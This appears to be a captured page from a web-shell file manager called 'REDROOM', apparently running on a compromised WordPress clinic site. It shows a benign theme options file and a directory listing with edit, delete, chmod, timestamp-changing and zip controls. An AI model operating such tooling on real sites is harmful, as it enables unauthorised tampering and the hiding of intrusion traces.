REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 1.46 KB
Close
/home/nshryvcy/radiantskinclinics.org/wp-content/themes/medizco/components/theme/options/customizer/options-blog.php
Text
Base64
<?php if (!defined('ABSPATH')) die('Direct access forbidden.'); /** * customizer option: blog */ $options =[ 'blog_settings' => [ 'title' => esc_html__( 'Blog settings', 'medizco' ), 'options' => [ 'blog_sidebar' =>[ 'type' => 'select', 'label' => esc_html__('Sidebar', 'medizco'), 'desc' => esc_html__('Description', 'medizco'), 'help' => esc_html__('Help tip', 'medizco'), 'choices' => array( '1' => esc_html__('No sidebar','medizco'), '2' => esc_html__('Left Sidebar', 'medizco'), '3' => esc_html__('Right Sidebar', 'medizco'), ), 'no-validate' => false, ], 'blog_author' => [ 'type' => 'switch', 'label' => esc_html__( 'Blog author', 'medizco' ), 'desc' => esc_html__( 'Do you want to show blog author?', 'medizco' ), 'value' => 'no', 'left-choice' => [ 'value' => 'yes', 'label' => esc_html__( 'Yes', 'medizco' ), ], 'right-choice' => [ 'value' => 'no', 'label' => esc_html__( 'No', 'medizco' ), ], ], ], ] ];
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 10
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
.htaccess
205 B
lr--r--r--
2026-02-23 02:01:28
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
options-banner.php
13.67 KB
lrw-r--r--
2020-12-03 03:41:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
options-blog.php
1.46 KB
lrw-r--r--
2019-10-30 02:44:26
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
options-footer.php
3.90 KB
lrw-r--r--
2021-06-07 21:59:42
Edit
Download
Rename
Chmod
Change Date
Delete
options-general.php
757 B
lrw-r--r--
2020-05-12 02:34:00
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
options-header.php
2.39 KB
lrw-r--r--
2020-05-12 02:34:00
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
options-license.php
686 B
lrw-r--r--
2023-02-07 10:36:42
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
options-preloader.php
14.19 KB
lrw-r--r--
2021-06-07 21:59:42
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
options-style.php
4.69 KB
lrw-r--r--
2019-10-30 02:44:26
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
options-woocommerce.php
6.26 KB
lrw-r--r--
2021-06-07 21:59:42
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).